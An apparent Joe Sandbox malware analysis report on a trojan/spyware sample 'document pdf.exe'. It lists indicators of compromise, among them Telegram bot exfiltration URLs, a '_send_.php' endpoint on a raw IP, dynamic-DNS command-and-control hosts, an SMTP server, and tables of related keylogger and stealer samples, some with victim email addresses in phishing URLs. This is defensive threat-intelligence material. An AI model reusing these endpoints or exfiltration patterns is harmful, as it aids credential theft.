https://api.telegram.org/bot/sendMessage?chat_id=&text= | document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | document pdf.exe, 00000003.00000002.4665157890.0000000002C07000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20a | document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?L | document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enh | document pdf.exe, 00000003.00000002.4665157890.0000000002BF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | document pdf.exe, 00000003.00000002.4665157890.0000000002C02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/h | document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | |
                                                                                                  high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
208.91.199.225 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584835
Start date and time: 2025-01-06 16:00:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: document pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/6@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 86
• Number of non-executed functions: 23
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.45, 40.126.32.136, 23.56.254.164, 20.12.23.50, 13.95.31.18, 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
10:01:07 | API Interceptor | 10615069x Sleep call for process: document pdf.exe modified
10:01:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.8.169 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.8.169 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | 0001.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | PK241200518-EMAIL RELEASE-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | checkip.dyndns.org/
149.154.167.220 | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com | malicious | Unknown |
149.154.167.220 | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown |
149.154.167.220 | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown |
149.154.167.220 | https://telegra.ph/Clarkson-122025-01-02 | malicious | Unknown |
149.154.167.220 | W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.67.152
reallyfreegeoip.org | file.exe | malicious | Snake Keylogger | 188.114.96.3
s-part-0017.t-0009.t-msedge.net | A7GSBA08HBVVDSA_pdf.lnk | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9 | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://www.housepricesintheuk.co.uk | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://o365info.com/get-unlicensed-onedrive-accounts/ | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604 | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Ref#66001032.exe | malicious | AgentTesla | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | #U7a0b#U5e8fv1.2.4.msi | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 2749837485743-7684385786.05.exe | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Insomia.exe | malicious | LummaC | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | setup64v6.4.5.msi | malicious | Unknown | 13.107.246.45
us2.smtp.mailhostbox.com | m30zZYga23.exe | malicious | AgentTesla | 208.91.199.223
us2.smtp.mailhostbox.com | New Purchase Order Document for PO1136908 000 SE.exe | malicious | AgentTesla | 208.91.199.225
us2.smtp.mailhostbox.com | nuevo orden.exe | malicious | AgentTesla | 208.91.199.224
us2.smtp.mailhostbox.com | Lpjrd6Wxad.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.198.143
us2.smtp.mailhostbox.com | REnBTVfW8q.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
us2.smtp.mailhostbox.com | ulf4JrCRk2.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
us2.smtp.mailhostbox.com | Nt8BLNLKN7.exe | malicious | AgentTesla, GuLoader | 208.91.199.223
us2.smtp.mailhostbox.com | copto de pago.exe | malicious | AgentTesla | 208.91.199.224
us2.smtp.mailhostbox.com | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223
us2.smtp.mailhostbox.com | Proforma Invoice_21-1541 And Packing List.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223
api.telegram.org | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com | malicious | Unknown | 149.154.167.220
api.telegram.org | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
api.telegram.org | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
api.telegram.org | https://telegra.ph/Clarkson-122025-01-02 | malicious | Unknown | 149.154.167.220
api.telegram.org | W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: TELEGRAMRU
  fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com | malicious | Unknown | 149.154.167.220
  https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
  https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
  ZT0KQ1PC.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
  RisingStrip.exe | malicious | Vidar | 149.154.167.99

Match: UTMEMUS
  yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.247.73
  ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
  kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
  armv5l.elf | malicious | Unknown | 132.244.2.45
  31.13.224.14-x86-2025-01-03T22_14_18.elf | malicious | Mirai | 132.226.42.231
  W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
  PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 132.226.8.169
  file.exe | malicious | Snake Keylogger | 132.226.247.73
  DEMONS.ppc.elf | malicious | Unknown | 132.226.227.252

Match: CLOUDFLARENETUS
  https://resolute-bear-n9r6wz.mystrikingly.com/ | malicious | Unknown | 104.17.24.14
  installer_1.05_36.8.exe | malicious | LummaC | 172.67.208.58
  setup.exe | malicious | LummaC | 104.21.96.1
  setup.msi | malicious | Unknown | 104.21.32.152
  https://sendbot.me/mousse-w0fysl7 | malicious | Unknown | 104.16.79.73
  http://gleapis.com/ | malicious | Unknown | 104.17.25.14
  SET_UP.exe | malicious | LummaC | 188.114.97.3
  http://jennadewanunwrapped.net | malicious | Unknown | 188.114.97.3
  http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9 | malicious | Unknown | 172.66.0.145
  Profile Illustrations and Technical Specifications for This System1.html | malicious | HTMLPhisher | 104.21.80.1

Match: PUBLIC-DOMAIN-REGISTRYUS
  yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 208.91.198.176
  ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 208.91.198.176
  http://www.technoafriwave.rw | malicious | Unknown | 207.174.214.183
  W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.115
  image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 208.91.198.176
  YinLHGpoX4.vbs | malicious | GuLoader, RHADAMANTHYS | 103.53.42.63
  v4BET4inNV.vbs | malicious | GuLoader | 103.53.42.63
  InvoiceNr274728.pdf.lnk | malicious | LummaC | 208.91.198.106
  Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 119.18.54.39
  List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 103.53.42.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
  yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
  ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
  PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
  kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
  PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.96.3
  adguardInstaller.exe | malicious | PureLog Stealer | 188.114.96.3
  W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.96.3

Match: 3b5074b1b5d032e5620f69f9f700ff0e
  https://sendbot.me/mousse-w0fysl7 | malicious | Unknown | 149.154.167.220
  fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  anrek.mp4.hta | malicious | LummaC Stealer | 149.154.167.220
  title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 149.154.167.220
  Agent381.msi | malicious | Unknown | 149.154.167.220
  Setup.exe | malicious | Unknown | 149.154.167.220
  Setup.exe | malicious | Unknown | 149.154.167.220
  yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
  Ref#66001032.exe | malicious | AgentTesla | 149.154.167.220

No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.1324276941010312
Encrypted: false
SSDEEP: 192:i0z7l30stA0BU/qa+OJoNZrYjzuiFcIZ24IO8V:i63HxBU/qa5XzuiFcIY4IO8V
MD5: 69196623F65F3FA586119772455FF634
SHA1: 11198347B211C84E4278F3DD3538570F6680AA27
SHA-256: 00C642DE0CAF61D52352763AE1CE10D6A06A91C564E553E383301617721365AE
SHA-512: 2091EB7444D8263115D8D1629B817BD9ACF7C1C1E1CCE334DD0F2426BCACD5340AD36ADC0F05ACC0B1D9FF34C8F982D23A1F87848F1CBA1263FF88E123D5D08D
Malicious: true
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Jan 6 15:01:10 2025, 0x1205a4 type
Category: dropped
Size (bytes): 309231
Entropy (8bit): 4.066699273044065
Encrypted: false
SSDEEP: 3072:clLe6SVGBDhW8V6w0xbr2o4uEqN+O+vLTgHiyJf1bp:clL1SVGBtRXeGo4++O+DTgCyr
MD5: 5F3B2D5C84A52AABCDB08A535ADDB597
SHA1: 9A73A738185FB55697BFFF8BE50C8A806DB6ABC1
SHA-256: 0C737E630ADAC246CA33BAC6605558E4D37A6A9C6609F9ED618A24D6FD9D8325
SHA-512: DBC2D2B71CBD0D27B5ECAA610450FF27A393C4C6B69621AB3CF0A90DDDC2D86A7F47E27D4210B5962CBDEFE09D7025055EA30859CE03367EC8D79DE4BB3C8977
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8418
Entropy (8bit): 3.6931458086857663
Encrypted: false
SSDEEP: 192:R6l7wVeJBLl6hmi6Y2DTmSU90ycgmfZwNpra89bt+sfjvm:R6lXJX6N6YvSU9Pcgmfazt9fS
MD5: FCFE1687E5FE1E24F8A0F917FAA798F3
SHA1: 458B6D22B1499ADC9F3DCAB64DCD67809718D68E
SHA-256: C478FC4D83690346677F1A465CE90F7075337ACB2B2976DEDBAA81C268FAAE65
SHA-512: FBD70F1BD3C1B79642CC27475C8B6AB95F4C0DAB3376ABC4753C4CDA15B47912D877073D52E3B6E91BC3BD213C116A4CE5C49D5D2FB8574FCECB300BB576AAD9
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4751
Entropy (8bit): 4.457807230516727
Encrypted: false
SSDEEP: 48:cvIwWl8zsDNJg77aI9BWWpW8VYvYm8M4J7EtbfFco+q8vdtb8mUDdp0dVCd:uIjfLI7P37VfJ7ERqoKdR8mUxp0dVCd
MD5: 3615BD54168E56AC04D094C763333600
SHA1: 71CAB1EB9A8A00097C816319B6B8D0ED5DB8DA13
